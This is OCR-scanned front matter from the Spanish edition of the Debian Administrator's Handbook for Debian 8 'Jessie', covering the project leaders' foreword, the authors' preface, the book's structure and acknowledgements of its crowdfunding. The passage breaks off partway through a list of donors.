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Debian  es  un  sistema  operativo  muy  exitoso,  presente  en  nuestras  vidas  digitales  mucho  mas  de 
lo  que  lagente  imagina  o  sabe.  Unos  pocos  ejemplos  son  suficientes  para  demostrarlo.  Al  momen¬ 
ta  de  escribir  estas  palabras,  Debian  es  la  variante  de  GNU/Linux  mas  popular  para  servidores 
web:  segun  WTTechs1  mas  de  10  %  de  la  web  funciona  con  Debian.  Considered  cuidadosamente: 
^cuantos  sitios  web  se  habria  perdido  de  no  ser  por  Debian?  En  otras  instalaciones  mas  intere- 
santes,  Debian  es  el  sistema  operativo  de  preferencia  en  la  estacion  espacial  internacional  (ISS: 
((International  Space  Station»).  ^Conoce  del  trabajo  de  los  astronautas  de  la  ISS,  tal  vez  a  traves 
de  la  presencia  de  la  NASA  en  las  redes  sociales  u  otras  organizaciones  internacionales?  Tanto 
el  trabajo  en  si  como  los  articulos  al  respecto  fueron  posibles  gracias  a  Debian.  Incontables  em- 
presas,  universidades  y  administraciones  publicas  confian  en  Debian  para  su  funcionamiento 
diario,  proveyendo  servicios  a  millones  de  usuarios  alrededor  del  mundo...  jy  en  su  orbital 

Pero  Debian  es  mucho  mas  que  un  sistema  operativo,  sin  importar  cuan  complejo,  funcional  y 
confiable  pueda  ser  dicho  sistema.  Debian  es  una  vision  de  las  libertades  que  todos  deberiamos 
disfrutar  en  un  mundo  en  el  que  cada  vez  mas  actividades  diarias  dependen  de  software.  Debian 
nace  de  las  bases  fundamentales  del  Software  Libre:  toda  persona  debe  tener  control  de  sus  equi- 
pos  y  no  a  la  inversa.  Aquellos  que  posean  suficiente  conocimiento  de  software  deberian  poder 
desmantelar,  modificar,  rearmar  y  compartir  con  otro  todo  el  software  que  les  importe.  No  im- 
porta  si  se  usa  el  software  para  actividades  frivolas  como  publicar  imagenes  de  gatitos,  o  tareas 
que  podrian  amenazar  la  vida  como  manejar  nuestros  autos  o  hacer  funcionar  los  dispositivos 
medicos  que  nos  curan  —  y  Debian  se  usa  en  todos  los  escenarios  anteriores;  deberiamos  tener 
el  control  completo.  Aquellos  que  no  tengan  un  conocimiento  profundo  del  software  tambien 
deberian  disfrutar  estas  libertades:  deberian  ser  capaces  de  delegar  a  quienes  ellos  decidan,  en 
quienes  confien,  la  auditoria  o  modificacion  del  software  de  sus  dispositivos  en  su  nombre. 

En  la  busqueda  del  control  sobre  las  maquinas,  los  sistemas  operativos  libres  tienen  un  rol  fun¬ 
damental:  no  puede  controlar  completamente  un  dispositivo  computacional  si  no  controla  su 
sistema  operativo.  De  aqui  proviene  la  ambicion  fundamental  de  Debian:  producir  el  mejor  siste¬ 
ma  operativo  completamente  libre.  Hace  ya  mas  de  20  anos  Debian  ha  desarrollado  un  sistema 
operativo  libre  y  tambien  promocionado  una  vision  de  Software  Libre  alrededor  del  mismo.  Al 
hacerlo,  Debian  subio  la  vara  para  los  promotores  del  software  libre  en  el  mundo.  Por  ejemplo, 
organizaciones  de  estandares  internacionales,  gobiernos  y  otros  proyectos  de  Software  Libre 
hacen  referencia  a  las  decisiones  de  Debian  en  cuestiones  de  licenciamiento  de  software  para 
decidir  si  algo  debe  ser  considerado  «suficientemente  libre»  o  no. 


1http : //w3techs . com/ 


Pero  esta  vision  politica  todavia  no  es  suficiente  para  explicar  cuan  especial  es  Debian.  Debian 
tambien  es  un  experimento  social  peculiar,  muy  cercano  a  su  independencia.  Considere  por  un 
momento  otras  distribuciones  de  Software  Libre  reconocidas,  o  inclusive  sistemas  operativos 
privativos  populares.  Es  probable  que  pueda  asociar  cada  una  de  ellas  con  una  gran  empresa 
que  es  la  fuerza  mayoritaria  en  el  desarrollo  del  proyecto  o,  cuando  menos,  el  supervisor  de 
todas  sus  actividades  ajenas  al  desarrollo.  Debian  es  diferente.  Dentro  del  Proyecto  Debian,  los 
voluntaries  eligen  por  si  mismos  las  responsabilidades  de  todas  las  actividades  necesarias  para 
mantener  a  Debian  vivo  y  coleando.  La  variedad  de  dichas  actividades  es  impresionante:  desde 
traducciones  a  administracion  de  sistemas,  desde  publicidad  a  la  gestion,  desde  organizacion  de 
conferencias  a  diseno  de  arte,  desde  los  registros  contables  a  cuestiones  legales...  jy  no  olvidemos 
el  empaquetado  de  software  y  el  desarrollo  en  si!  Los  colaboradores  de  Debian  se  encargan  de 
todas  ellas. 

Como  primera  consecuencia  de  esta  forma  radical  de  independencia,  es  que  Debian  necesita 
y  confia  en  una  comunidad  de  voluntaries  muy  diversa.  Cualquier  habilidad  en  cualquier  area 
mencionada,  u  otras  que  pueda  imaginar,  puede  invertirse  en  Debian  y  utilizarse  para  mejorar  el 
proyecto.  Una  segunda  consecuencia  de  la  independencia  de  Debian  es  que  se  puede  confiar  en 
que  las  decisiones  de  Debian  no  son  influenciadas  por  intereses  comerciales  o  empresas  especi- 
ficas  —  intereses  sobre  los  que  no  tenemos  garantias  siempre  esten  alineados  con  el  objetivo  de 
promocionar  el  control  que  tiene  la  gente  sobre  las  maquinas,  como  muchos  ejemplos  recientes 
en  las  noticias  tecnologicas  atestiguan. 

Un  ultimo  aspecto  contribuye  a  que  Debian  sea  unico:  la  forma  en  la  que  se  conduce  el  expe¬ 
rimento  social.  A  pesar  de  su  fama  burocratica,  la  toma  de  decisiones  en  Debian  esta  muy  dis- 
tribuida.  Existen  areas  de  responsabilidad  bien  definidas  dentro  del  proyecto.  Quienes  estan  a 
cargo  de  dichas  areas  pueden  hacerlo  como  lo  deseen.  Siempre  que  adhieran  a  los  requisitos  de 
calidad  acordados  por  la  comunidad,  nadie  puede  decirles  que  hacer  o  como  hacerlo.  Si  desea 
tener  incidencia  en  como  se  hace  algo  en  Debian,  necesita  estar  dispuesto  a  poner  su  reputacion 
en  juego  y  tomar  dicho  trabajo  sobre  sus  hombros.  Esta  forma  peculiar  de  meritocracia  —  a  ve- 
ces  llamada  «do-ocracy»  (del  ingles  «do»:  hacer)  —  apodera  a  los  colaboradores.  Cualquiera  con 
suficiente  habilidad,  tiempo  y  motivacion  puede  tener  un  impacto  real  en  la  direccion  que  toma 
el  proyecto.  Es  testigo  de  esto  la  poblacion  de  alrededor  de  1000  miembros  oficiales  del  Proyecto 
Debian  y  miles  de  colaboradores  en  todo  el  mundo.  No  es  sorpresa  que  se  diga  que  Debian  es  el 
proyecto  de  Software  Libre  llevado  a  cabo  por  una  comunidad  mas  grande  que  existe. 

Asi  que  Debian  es  bastante  unico.  ^Somos  los  unicos  que  lo  notamos?  Definitivamente  no.  Se- 
gun  DistroWatch2,  existen  alrededor  de  300  distribuciones  de  Software  Libre  activas.  La  mitad 
de  ellas  (alrededor  de  140)  son  derivadas  de  Debian.  Esto  significa  que  comienzan  con  Debian,  lo 
adaptan  a  las  necesidades  de  sus  usuarios  —  generalmente  agregando,  modificando  o  reconstru- 
yendo  paquetes  —  y  publican  el  producto  que  resulta.  Esencialmente,  las  distribuciones  deriva¬ 
das  utilizan  las  libertadas  que  ofrece  el  Software  Libre  para  modificar  y  redistribuir  copias  no 
solo  de  porciones  individuales  de  software  sino  de  la  distribucion  completa.  El  potencial  para  al- 
canzar  nuevos  usuarios  y  colaboradores  de  Software  Libre  a  traves  de  distribuciones  derivadas 
es  enorme.  Creemos  que  es  gracias  a  ese  ecosistema  floreciente  que  el  Software  Libre  hoy  en  dia 
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finalmente  le  hace  frente  a  software  privativo  en  campos  que  historicamente  eran  considerados 
diffciles  de  conquistar,  como  grandes  despliegues  de  sistemas  de  escritorio.  Debian  se  ubica  en 
la  rafz  del  ecosistema  de  distribuciones  de  Software  Libre  mas  grande  que  existe:  inclusive  si  no 
utiliza  Debian  directamente,  e  inclusive  si  se  lo  informo  su  distribuidor,  es  posible  que  ahora  se 
este  beneficiando  del  trabajo  de  la  comunidad  de  Debian. 

Pero  el  que  Debian  sea  unico  acarrea  (a  veces)  inesperadas  consecuencias.  Una  consecuencia  de 
la  vision  de  Debian  sobre  libertades  digi tales  fue  la  necesidad  de  redefinir  lo  que  entendemos  por 
software.  Hace  tiempo  que  el  Proyecto  Debian  se  dio  cuenta  que,  como  parte  de  un  sistema  ope¬ 
rative,  necesita  distribuir  material  que  no  es  software:  musica,  imagenes,  documentacion,  datos 
en  crudo,  firmware,  etc.  ^Como  se  aplican  la  libertades  de  software  a  ese  material?  ^Deberfan 
existir  requisites  particulares  o  todo  el  material  deberfa  estar  sujeto  a  los  mismos,  y  altos,  estan- 
dares  de  libertad?  El  Proyecto  Debian  se  decidio  por  esto  ultimo:  todo  el  material  provisto  como 
parte  de  Debian  deberfa  ofrecer  las  mismas  libertades  a  sus  usuarios.  Esa  posicion  filosofica  tan 
radical  tiene  efectos  de  gran  alcance.  Significa  que  no  podemos  distribuir  firmware  privativo,  u 
obras  de  arte  que  no  pueden  utilizarse  en  ambientes  comerciales,  o  libros  que  no  pueden  modi- 
ficarse  para  evitar  manchar  (como  dice  el  folklore  de  publicadores  de  libros)  la  reputacion  del 
autor/ publicador. 

El  libro  que  tiene  en  sus  manos  es  diferente.  Es  un  libro  litre  como  la  libertad,  un  libro  que  se 
adhiere  a  los  estandares  de  libertad  de  Debian  para  todos  los  aspectos  de  su  vida  digital.  Por 
mucho  tiempo,  la  escasa  disponibilidad  de  libros  como  este  fue  una  gran  limitacion  de  Debian. 
Significaba  que  existfa  poco  material  de  lectura  que  ayudara  a  difundir  Debian  y  sus  valores 
al  mismo  tiempo  que  representara  dichos  valores  y  mostrara  sus  ventajas.  Pero  tambien  signi¬ 
ficaba,  ironicamente,  que  tenfamos  poco  material  que  pudieramos  distribuir  con  Debian  en  sf 
mismo.  Este  es  el  primer  libro  reputable  que  intenta  solucionar  esta  limitacion.  Puede  utilizar 
apt  install  para  obtener  este  libro,  puede  redistribuirlo,  puede bifurcarlo  o,  mej or  aun,  enviar 
reportes  de  error  y  correcciones  para  el  mismo  de  forma  que  otros  puedan  beneficiarse  de  sus 
contribuciones.  Los  «encargados»  de  este  libro  —  que  tambien  son  sus  autores  —  son  miembros 
del  Proyecto  Debian  desde  hace  mucho  tiempo,  quienes  asimilaron  y  fueron  asimilados  por  la 
distintiva  libertad  que  empapa  todo  aspecto  de  Debian  y  conocen  de  primera  mano  lo  que  signi¬ 
fica  ser  responsables  de  partes  importantes  de  Debian.  Al  liberar  este  libro  Libre  realizan,  una 
vez  mas,  un  fantastico  servicio  a  la  comunidad  Debian. 

Esperamos  que  disfrute,  tanto  como  nosotros  esta  piedra  angular  de  la  lectura  libre  sobre  De¬ 
bian. 

Octubre  de  2015 

Stefano  Zacchiroli  (lfder  del  proyecto  Debian  2010-2013),  Lucas  Nussbaum  (lfder  del  proyecto 
Debian  2013-2015)  y  Neil  McGovern  (lfder  del  proyecto  Debian  2015-actualmente  en  el  puesto) 
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P  ref ac  i  o 


Desde  hace  varios  anos  Linux  adquiere  cada  vez  mas  fuerza,  y  su  creciente  popularidad  impulsa 
a  cada  vez  mas  y  mas  usuarios  a  dar  el  salto.  El  primer  paso  en  este  camino  consiste  en  elegir  una 
distribucion.  Es  una  decision  importante  ya  que  cada  distribucion  tiene  sus  propias  peculiarida- 
des  y  una  eleccion  correcta  desde  el  principio  puede  evitar  los  costos  de  migraciones  futuras. 

VOLVER  A  LOS  CIMIENTOS  Estrictamente  hablando,  Linux  es  solo  un  nucleo,  la  pieza  central  de  software  que 
distribucion  Linux  se  encuer|tra  entre  el  hardware  y  las  aplicaciones. 

nucleo  Linux  Una  «distribucion  Linux»  es  un  sistema  operativo  completo;  normalmente  incluye 
el  nucleo  Linux,  un  programa  instalador  y  sobre  todo  aplicaciones  y  otro  software 
necesario  para  convertir  un  equipo  en  una  herramienta  realmente  util. 

Debian  GNU/Linux  es  una  distribucion  de  Linux  «generica»  que  se  ajusta  a  la  mayorfa  de  los 
usuarios.  El  proposito  de  este  libro  es  mostrar  sus  numerosos  aspectos  para  que  pueda  tomar 
una  decision  fundada  en  el  momento  de  elegir  una  distribucion. 

^Por  que  este  libro? 


CULTURA  La  mayorfa  de  distribuciones  Linux  estan  respaldadas  por  empresas  con  fines  de 
Distribuciones  lucro  que  las  desarrollan  y  comercializan  bajo  algun  tipo  de  plan  comercial.  Algunos 
comerciales  ejemplos  son  Ubuntu,  principalmente  desarrollado  por  Canonical  Ltd.-,  Mandriva 
Linux,  por  la  compafifa  francesa  Mandriva  5/4;  y  Suse  Linux,  que  es  mantenida  y 
comercializada  por  Novell. 

En  el  extremo  opuesto  se  encuentran  aquellas  similares  a  Debian  y  de  la  «Apache 
Software  Foundation*  (que  alberga  el  desarrollo  del  servidor  web  Apache).  Debian 
es  ante  todo  un  proyecto  en  el  mundo  del  Software  Libre,  implementado  por  volun¬ 
taries  que  trabajan  juntos  a  traves  de  Internet.  Si  bien  algunos  de  ellos  trabajan  en 
Debian  como  parte  del  trabajo  que  realizan  en  varias  empresas,  el  proyecto  como 
tal  no  esta  asociado  a  ninguna  empresa  en  particular,  asf  como  tampoco  ninguna 
empresa  tiene  una  influencia  especial  en  las  cuestiones  del  proyecto  que  la  que 
posee  cualquier  colaborador  voluntario. 

Linux  ha  disfrutado  de  una  gran  cobertura  mediatica  en  los  ultimos  anos;  esta  beneficia  sobre  to¬ 
do  a  las  distribuciones  que  se  apoyan  en  un  departamento  de  marketing  real  —  en  otras  palabras: 
distribuciones  respaldas  por  empresas  (Ubuntu,  Red  Hat,  SUSE,  Mandriva,  etc.).  Sin  embargo,  De¬ 
bian  esta  lejos  de  ser  una  distribucion  marginal;  muchos  estudios  mostraron  a  traves  de  los  anos 


que  se  utiliza  tanto  en  servidores  como  escritorios.  Esto  es  particularmente  cierto  en  servidores 
web,  donde  Debian  es  la  distribution  Linux  de  preferencia. 

•-  http : //www. heise . de/open/a rtikel/Eingesetzte- Prod ukte- 224518 . html 

http ://w3techs . com/blog/ent  ry/debian_ubuntu_extend_the_dominance_in_the_ 
linux__web_server_market_at_the_expense_of_red_hat_centos 

El  proposito  de  este  libro  es  ayudarle  a  descubrir  esta  distribution.  Esperamos  compartir  la  ex- 
periencia  que  hemos  acumulado  desde  que  nos  unimos  al  proyecto  como  desarrolladores  y  con- 
tribuidores  en  1998  (Raphael)  y  2000  (Roland).  Con  suerte,  transmitiremos  nuestro  entusiasmo 
y  quizas  decidas  unirte  a  nosotros  algun  dia... 

La  primera  edition  de  este  libro  (en  2004)  sirvio  para  llenar  un  vacio:  fue  el  primer  libro  en 
trances  que  se  centro  exclusivamente  en  Debian.  En  ese  momento  se  escribieron  muchos  otros 
libros  sobre  Debian,  tanto  para  los  lectores  de  habla  francesa  como  para  los  de  habla  inglesa. 
Lamentablemente  casi  ninguno  de  ellos  fue  actualizado  desde  entonces,  y  con  los  anos  volvimos 
a  una  situation  en  la  que  habia  muy  pocos  libros  buenos  sobre  Debian.  Esperamos  que  este  libro, 
que  cobro  vida  nuevamente  desde  su  traduction  al  ingles  (y  varias  traducciones  del  ingles  a 
muchos  otros  idiomas)  llene  este  vacfo  y  ayude  a  muchos  usuarios. 


iPara  quien  es  este  libro? 

tiemos  intentado  hacer  un  libro  util  para  muchas  categories  de  lectores.  En  primer  lugar,  admi- 
nistradores  de  sistemas  (tanto  principiantes  como  expertos)  encontraran  explicaciones  acerca 
de  la  instalacion  y  despliegue  en  muchos  equipos.  Tambien  se  haran  una  idea  de  la  mayoria  de 
los  servicios  disponibles  en  Debian,  junto  con  las  instrucciones  de  configuration  y  una  descrip- 
cion  de  las  particularidades  de  la  distribution.  Comprender  los  mecanismos  que  tienen  lugar 
en  el  desarrollo  de  Debian  les  capacitara  para  tratar  con  problemas  imprevistos,  sabiendo  que 
siempre  pueden  contar  con  la  ayuda  de  la  comunidad. 

Los  usuarios  de  otras  distribuciones  de  Linux,  o  de  otra  variante  de  Unix,  descubriran  las  carac- 
teristicas  especificas  de  Debian  y  se  adaptaran  muy  rapidamente  mientras  se  benefician  plena- 
mente  de  las  ventajas  unicas  de  esta  distribution. 

Finalmente,  los  lectores  que  ya  tienen  conocimientos  previos  de  Debian  y  quieren  conocer  mas 
acerca  de  la  comunidad  que  se  encuentra  detras,  veran  sus  expectativas  cumplidas.  Este  libro 
deberia  acercarles  mucho  mas  a  unirse  a  nosotros  como  colaboradores. 


Enfoque  general 

Toda  la  documentation  generica  que  pueda  encontrar  acerca  de  GNU/Linux  tambien  es  aplica- 
ble  a  Debian  ya  que  Debian  incluye  la  mayoria  del  software  libre.  Sin  embargo,  la  distribution 
incorpora  muchas  mejoras,  por  lo  que  hemos  decidido  describir  primeramente  la  «forma  De- 
bian»  de  hacer  las  cosas. 
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Es  importante  seguir  las  recomendaciones  de  Debian,  pero  es  aun  mas  importante  entender  sus 
razones.  Por  lo  tanto,  no  nos  limitaremos  solamente  a  explicaciones  practicas;  tambien  descri- 
biremos  la  forma  en  la  que  funciona  el  proyecto  para  brindarle  un  conocimiento  exhaustivo  y 
consistente. 


Estructura  del  Iibro 

Este  libro  nace  en  la  coleccion  «Libro  del  Administrador»  de  la  editorial  francesa  Eyrolles,  y 
mantiene  el  mismo  enfoque  en  torno  a  un  caso  de  estudio  que  proporciona  apoyo  y  ejemplos  de 
todos  los  temas  abordados  en  el  mismo. 


NOTA  Este  libro  tiene  su  propio  sitio  web  que  alberga  todos  los  elementos  que  pueden 
Sitio  web  email  del  autor  hacerlo  mas  util.  En  particular,  incluye  una  version  online  del  libro  con  enlaces  en 

los  cuales  se  puede  hacer  clic  y  posible  fe  de  erratas.  Sientase  libre  de  navegarlo 
y  dejarnos  sus  comentarios  y  sugerencias.  Nos  alegrara  leer  sus  opiniones  o  sus 
mensajes  de  apoyo.  Envie  un  email  a  hertzog@debian.org  (Raphael)  y  lolando@ 
debian.org  (Roland). 

http://debian-handbook.info/ 


El  capftulo  1  se  centra  en  una  presentation  no  tecnica  del  proyecto  Debian  y  describe  sus  obje- 
tivos  y  organization.  Estos  aspectos  son  importantes  porque  definen  un  marco  general  que  se 
completara  en  otros  capitulos  con  information  mas  concreta. 

Los  capitulos  2  y  3  presentan  el  caso  de  estudio  en  lineas  generales.  Llegados  a  este  punto  los 
lectores  principiantes  pueden  echar  un  vistazo  al  apendice  B,  donde  pueden  encontrar  un  breve 
curso  que  explica  nociones  basicas  de  informatica,  asi  como  tambien  los  conceptos  inherentes 
a  cualquier  sistema  Unix. 

Para  comenzar  nuestro  tema  principal,  logicamente  vamos  a  empezar  con  el  proceso  de  instala- 
cion  (capftulo  4);  los  capitulos  5  y  6  daran  a  conocer  las  herramientas  basicas  que  todo  admi- 
nistrador  de  Debian  utilizara,  como  las  pertenecientes  a  la  familia  APT  que  es,  en  gran  parte,  la 
responsable  de  la  excelente  reputation  de  la  distribution.  Estos  capitulos  no  son  exclusivamente 
para  profesionales,  puesto  que  cada  uno  en  su  casa  es  su  propio  administrador. 

El  capftulo  7  sera  un  parentesis  importante,  describe  los  flujos  de  trabajo  para  usar  eficiente- 
mente  la  documentation  y  para  comprender  rapidamente  los  problemas  con  el  fin  de  resolver- 
los. 

Los  capitulos  siguientes  proporcionaran  una  vision  mas  detallada  del  sistema,  empezando  por 
la  infraestructura  basica  y  los  servicios  (desde  el  capftulo  8  hasta  el  10)  y  se  ira  avanzado 
progresivamente  hasta  las  aplicaciones  de  usuario  en  el  capftulo  13.  El  capftulo  12  trata  de 
temas  mas  avanzados  relacionados  directamente  con  los  administradores  de  grandes  conjuntos 
de  equipos  (incluyendo  servidores),  mientras  que  el  capftulo  14  es  una  breve  introduction  al 
tema  mas  amplio  que  es  la  seguridady  proporciona  algunas  claves  para  evitar  la  mayoria  de  los 
problemas. 
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El  capftulo  15  es  para  administradores  que  quieran  profundizar  y  crear  sus  propios  paquetes 
Debian. 


VOCABULARIO  Un  paquete  Debian  es  un  archivo  que  contiene  todos  los  archivos  necesario  para 
Paquete  Debian  instalar  una  pieza  de  software.  Normalmente  es  un  archivo  con  extension  .deb  y 
puede  ser  manipulado  con  el  programa  dpkg.  Tambien  conocido  como  un  paquete 
binario,  contiene  los  archivos  que  pueden  ser  utilizados  directamente  (tales  como 
programas  y  documentacion).  Por  otro  lado,  un  paquete  fuente  contiene  el  codigo 
fuente  para  el  software  y  las  instrucciones  necesarias  para  construir  el  paquete 
binario. 


La  version  actual  es  ya  la  septima  edicion  del  libro  (incluyendo  las  cuatro  primeras,  que  solo 
estaban  disponibles  en  trances).  Esta  edicion  cubre  la  version  8  de  Debian,  cuyo  nombre  codi¬ 
go  es  Jessie.  Entre  los  cambios,  Debian  ahora  soporta  dos  nuevas  arquitecturas  —  arm64  para 
procesadores  ARM  de  64  bits,  and  ppc64el  para  los  procesadores  PowerPC  de  64  bits  little-endian 
(disenados  por  IBM  y  licenciados  a  varios  fabricantes  a  traves  de  la  Fundacion  OpenPOWER).  Por 
otro  lado  se  han  desechado  algunas  arquitecturas  ( spare  e  ia64)  debido  a  la  falta  de  voluntaries 
para  mantener  el  desarrollo  al  dfa  (lo  que  puede  explicarse  por  el  hecho  de  que  el  hardware  re- 
lacionado  esta  quedando  obsoleto  y  es  menos  interesante  trabajar  en  el).  Algunas  arquitecturas 
todavia  siguen  disponibles  (en  la  rama  Unstable )  pero  no  con  el  sello  de  listo  para  distribuir:  hurd- 
i386,  kfreebsd-i386  y  kfreebsd-amd64.  Todos  los  paquetes  incluidos  obviamente  se  han  actualizado, 
incluyendo  el  escritorio  GNOME,  el  cual  viene  ahora  con  la  version  3.14.  Mas  interesante,  hay 
dos  alternativas  de  escritorio  disponibles:  Cinnamon3  (bifurcacion  del  Shell  de  GNOME  creada 
por  y  para  Linux  Mint)  y  MATE4  (continuacion  de  la  version  2.x  del  escritorio  GNOME  2.x). 

Eiemos  anadido  algunas  notas  y  comentarios  en  recuadros.  Cumplen  varias  funciones:  pueden 
remarcar  un  punto  difi'cil,  complementar  nociones  del  caso  de  estudio,  definir  algunos  termi- 
nos  o  servir  como  recordatorios.  A  continuacion  se  muestra  una  lista  de  las  anotaciones  mas 
comunes: 

■  VOLVER  A  LOS  CIMIENTOS:  un  recordatorio  acerca  de  informacion  que  se  supone  ya  es 
conocida  por  el  lector; 

■  VOCABULARIO:  define  un  termino  tecnico,  a  veces  especifico  de  Debian; 

■  COMUNIDAD:  resalta  personas  o  roles  importantes  dentro  del  proyecto; 

■  NORMA:  una  regia  o  recomendacion  de  la  Politica  de  Debian  («Debian  Policy»).  Este  do- 
cumento  es  esencial  en  el  proyecto  y  describe  como  empaquetar  software.  Las  partes  de 
la  politica  resaltadas  en  este  libro  proporcionaran  beneficios  directos  a  los  usuarios  (por 
ejemplo:  el  saber  que  estandariza  la  ubicacion  de  la  documentacion  y  los  ejemplos  facilita 
encontrarlos  incluso  en  un  nuevo  paquete). 

■  HERRAMIENTA:  presenta  una  herramienta  o  servicio  relevante; 


3http: //cinnamon. linuxmint . com/ 
4  http : //mate- desktop . org/ 
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■  EN  LA  PRACTICA:  la  teorfa  y  la  practica  no  siempre  coinciden;  estos  recuadros  contienen 
consejos  que  son  el  resultado  de  nuestra  experiencia.  Tambien  pueden  proporcionar  ejem- 
plos  detallados  y  concretos; 

■  otros  recuadros  mas  o  menos  frecuentes  son  bastante  expllcitos:  CULTURA,  SUGERENCIA, 
PRECAUCION,  YENDO  MAS  ALLA,  SEGURIDAD  y  asf. 


Reconocimientos 

Un  poco  de  historia 

En  2003,  Nat  Makarevitch  se  puso  en  contacto  con  Raphael  porque  querfa  publicar  un  libro  so- 
bre  Debian  en  la  coleccion  Cahier  de  1’ Admin  («libro  del  administrador»)  que  estaba  coordinando 
para  Eyrolles,  un  editor  trances  de  libros  tecnicos.  Raphael  acepto  escribirlo  inmediatamente. 
La  primera  edicion  salio  a  la  luz  el  14  de  octubre  de  2004  y  tuvo  un  gran  exito  —  se  agoto  apenas 
cuatro  meses  mas  tarde. 

Desde  entonces,  hemos  publicado  6  ediciones  del  libro  en  trances,  uno  para  cada  version  pos¬ 
terior  de  Debian.  Roland,  quien  inicialmente  trabajo  en  el  libro  como  corrector,  poco  a  poco  se 
convirtio  en  su  co-autor. 

Si  bien  estabamos  satisfechos,  obviamente,  con  el  exito  del  libro  siempre  esperamos  que  Eyrolles 
convenciera  a  un  editor  internacional  para  que  realizara  la  traduccion  al  ingles.  Hemos  recibi- 
do  numerosos  comentarios  que  explican  como  el  libro  ayudo  a  gente  a  empezar  con  Debian  y 
estabamos  interesados  en  ayudar  a  mas  personas  de  la  misma  manera. 

Por  desgracia,  no  conseguimos  contactar  con  ningun  editor  de  habla  inglesa  que  estuviera  dis- 
puesto  a  correr  el  riesgo  de  traduciry  publicar  el  libro.  No  nos  dejamos  intimidar  por  este  peque- 
no  contratiempo  y  negociamos  con  nuestro  editor  trances,  Eyrolles  y  recuperamos  los  derechos 
necesarios  para  traducir  el  libro  al  ingles  y  publicarlo  nosotros  mismos.  Gracias  a  una  campana 
de  financiacion  colectiva  («crowdfunding»),  trabajamos  en  la  traduccion  desde  Diciembre  de 
2011  y  Mayo  de  2012.  jAsi  nacio  el  «Libro  del  administrador  de  Debian»  y  fue  publicado  bajo  una 
licencia  de  software  libre! 

Si  bien  este  fue  un  avance  importante,  sabiamos  que  nuestra  historia  no  acabaria  hasta  que 
contribuyeramos  el  libro  en  trances  como  una  traduccion  oficial  del  libro  en  ingles.  Esto  no 
fue  posible  originalmente  porque  Eyrolles  todavia  distribufa  comercialmente  el  libro  en  trances 
bajo  una  licencia  privativa. 

En  2013,  la  publicacion  de  Debian  7  nos  proveyo  una  buena  oportunidad  para  discutir  un  nuevo 
contrato  con  Eyrolles.  Los  convencimos  que  una  licencia  mas  acorde  con  los  valores  de  Debian 
ayudaria  al  exito  del  libro.  No  fue  una  negociacion  sencilla  y  acordamos  organizar  una  nueva 
campana  de  financiacion  colectiva  para  cubrir  algunos  de  los  gastos  y  reducir  los  riesgos  invo- 
lucrados.  Dicha  operacion,  nuevamente,  fue  un  gran  exito  y  agregamos  la  traduccion  al  trances 
del  «Libro  del  administrador  de  Debian»  en  Julio  de  2013. 
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Nacimiento  del  libro  en  ingles 

Volvemos  a  2011,  cuando  acababamos  de  obtener  los  derechos  necesarios  para  traducir  al  ingles 
nuestro  libro  en  trances.  Estamos  investigando  formas  de  lograrlo. 

Traducir  un  libro  de  450  paginas  supone  un  esfuerzo  considerable  que  requiere  varios  meses 
de  trabajo.  Trabajadores  autonomos  como  nosotros  tuvimos  que  garantizar  unos  ingresos  mini- 
mos  para  poder  disponer  del  tiempo  necesario  para  completar  el  proyecto.  Asi  que  pusimos  en 
marcha  una  campana  de  financiacion  publica  en  Ulule  y  pedimos  a  la  gente  que  contribuyera  al 
proyecto  comprometiendose  economicamente. 

http : //www. ulule . com/debian- handbook/ 

La  campana  tenia  dos  objetivos:  alcanzar  la  cifra  de  15.000  €  para  poder  realizar  la  traduccion  y 
llegar  a  disponer  de  un  fondo  para  la  liberacion  del  libro  de  25.000  €  que  hiciera  que  el  mismo 
sea  publicado  bajo  una  licencia  libre  —  es  decir,  una  licencia  que  sigue  fielmente  las  directrices 
de  software  libre  de  Debian  («Debian  Free  Software  Guidelines))). 

Cuando  termino  la  campana  en  Ulule,  se  habia  logrado  alcanzar  el  primer  objetivo  con  24.345 
€.  Sin  embargo,  no  se  completo  el  fondo  para  la  liberacion  del  libro,  recaudando  solo  14.395  €. 
Tal  y  como  se  anuncio  inicialmente,  la  campana  para  la  liberacion  del  libro  continuo  en  el  sitio 
oficial  del  libro  independientemente  de  Ulule. 

Mientras  estabamos  ocupados  traduciendo  el  libro,  continuaron  las  donaciones  para  la  libera¬ 
cion  del  libro...  Y  en  abril  de  2012  se  alcanzo  el  monto  necesario  para  la  liberacion.  De  este  modo 
es  que  puede  beneficiarse  de  este  libro  bajo  los  terminos  de  una  licencia  libre. 

Nos  gustaria  dar  las  gracias  a  todos  los  que  contribuyeron  con  estas  campanas  de  recaudacion 
de  fondos,  ya  sea  mediante  la  promesa  de  algo  de  dinero  o  pasando  la  voz.  No  podriamos  haberlo 
hecho  sin  ti. 


Empresas  y  organizaciones  de  apoyo 

Tuvimos  el  placer  de  conseguir  importantes  contribuciones  de  muchas  empresas  y  organizacio¬ 
nes  afines  al  software  libre.  Gracias  a  Code  Lutin5,  Ecole  Ouverte  Francophone6,  Evolix7,  Fantini 
Bakery8,  FSF  France9,  Offensive  Security10  (la  empresa  detras  de  Kali  Linux11),  Opensides12,  Prox- 
mox  Server  Solutions  Gmbh13,  SSIELL  («Societe  Solidaire  d’lnformatique  En  Logiciels  Libres»)  y 
Syminet14. 


5  http : //www. codelutin . com 
6http : //eof .eu.org 
7  http : //www. evolix . f r 
8 http : //www. f antinibakery . com 
9http://fsffrance.org 

10  http :  //www.  of  tensive-  security .  com 

11  http : //www.  kali .  org 

12 http : //www. opensides  .  be 
13 http :  //www.  proxmox .  com 
14 http : //www.  syminet .  com 
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Tambien  nos  gustarfa  dar  las  gracias  a  OMG!  Ubuntu15  y  a  April16  por  su  ayuda  en  la  promocion 
del  proyecto. 


Apoyos  individuates 

Con  mas  de  650  contribuyentes  en  la  recaudacion  inicial  de  fondos  y  varios  cientos  mas  en  la 
campana  de  liberacion  posterior,  este  proyecto  ha  sido  posible  gracias  a  personas  como  usted. 
jGracias! 

Queremos  dar  las  gracias  especialmente  a  aquellos  que  han  contribuido  con  al  menos  35  €  (ja 
veces  mucho  mas!)  al  fondo  para  la  liberacion  del  libro.  Estamos  encantados  de  que  haya  tantas 
personas  que  compartan  nuestros  valores  de  libertady  sin  embargo  reconocen  que  meredamos 
una  compensacion  por  el  trabajo  realizado  en  este  proyecto. 

Asi  que  gracias  a  Alain  Coron,  Alain  Thabaud,  Alan  Milnes,  Alastair  Sherringham,  Alban  Du- 
merain,  Alessio  Spadaro,  Alex  King,  Alexandre  Dupas,  Ambrose  Andrews,  Andre  Klarner,  An¬ 
